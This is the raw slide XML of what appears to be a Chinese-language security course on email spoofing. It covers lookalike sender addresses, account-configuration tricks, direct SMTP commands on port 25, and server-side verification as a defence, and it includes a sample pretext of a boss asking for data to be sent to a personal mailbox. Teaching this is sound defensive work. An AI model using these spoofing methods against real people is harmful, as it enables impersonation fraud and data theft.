        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CAC3C421-99B2-4ED9-BF40-51BB15CF9114}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>200</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2455580066"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>
  </p:transition>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23" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>电子邮件欺骗的动机</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>匿名信</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗的形式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用类似的电子邮件地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改邮件客户软件的账号配置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接连到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>smtp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器上发信</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235522" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>电子邮件欺骗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4D64A73E-3B3A-4B19-83B9-B67A0A81D187}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>201</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19159766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3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55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355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r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发信人使用被假冒者的名字注册一个账号，然后给目标发送一封正常的信</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236546" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>电子邮件欺骗：使用类似的地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{12B9B9DD-50B3-40BB-A4C2-91BDE63478D8}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>202</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="236549" name="Picture 5" descr="j0292020"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="973138" y="3860800"/>
            <a:ext cx="1296987" cy="1230313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="236550" name="Picture 6" descr="j0195384"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5726113" y="2781300"/>
            <a:ext cx="1409700" cy="1439863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236554" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2268538" y="3573463"/>
            <a:ext cx="3313112" cy="792162"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="236555" name="Picture 11" descr="j0285698"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5724525" y="4365625"/>
            <a:ext cx="1212850" cy="1296988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236556" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-755554">
            <a:off x="2268538" y="3141663"/>
            <a:ext cx="3168650" cy="822325"/>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我是你的上司</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>XX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>，请把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>XXX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>发送给我</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236557" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-755554">
            <a:off x="2486025" y="4005263"/>
            <a:ext cx="3168650" cy="822325"/>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我在外面度假，请送到我的个人信箱</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236558" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="7308850" y="3573463"/>
            <a:ext cx="1584325" cy="792162"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 65727"/>
              <a:gd name="adj2" fmla="val 100296"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rot="10800000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>她</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>能识别吗？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25326320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8" grpId="0" animBg="1"/>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8595" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>邮件帐户配置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>姓名属性，会出现在“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>From”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Reply-To</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>”字段中，然后显示在“发件人”信息中</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>电子邮件地址，会出现在“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>From”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字段中</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238594" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>帐户配置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="灯片编号占位符 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5BF14290-BB14-427E-92C3-96CCC7347300}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>203</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="238603" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3657600"/>
            <a:ext cx="4210050" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="238605" name="Picture 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="6172200"/>
            <a:ext cx="5076825" cy="361950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354491753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8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385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743" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3347864" y="1988840"/>
            <a:ext cx="5001323" cy="3877216"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244738" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>邮件欺骗：直接连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000"/>
              <a:t>smtp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>服务器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B3B058DF-BDE7-4891-B315-7FA65668AC9B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>204</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244745" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2060575"/>
            <a:ext cx="3455988" cy="3898900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>直接连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>smtp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>端口，然后发送命令，常见命令为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Helo(or EHLO)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Mail from:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Rcpt to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Quit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3296527322"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>
  </p:transition>
</p:sld>
</file>

<file path=ppt/slides/slide20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0883" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>邮件服务器的验证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Smtp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器验证发送者的身份，以及发送的邮件地址是否与邮件服务器属于相同的域</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>验证接收方的域名与邮件服务器的域名是否相同</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有的也验证发送者的域名是否有效，通过反向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>解析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不能防止一个内部用户假冒另一个内部用户发送邮件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250882" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>邮件欺骗的保护</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{21FAF56A-2195-4DE9-BEC9-17E00E4E8D22}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>205</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51986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0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p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗根源在于：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的开放性，任何人都可以建立自己的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>站点</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>站点名字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>域名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以自由注册，按先后顺序</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>并不是每个用户都清楚</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的运行规则</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗的动机</a:t>
            </a:r>
          </a:p>
          <a:p>
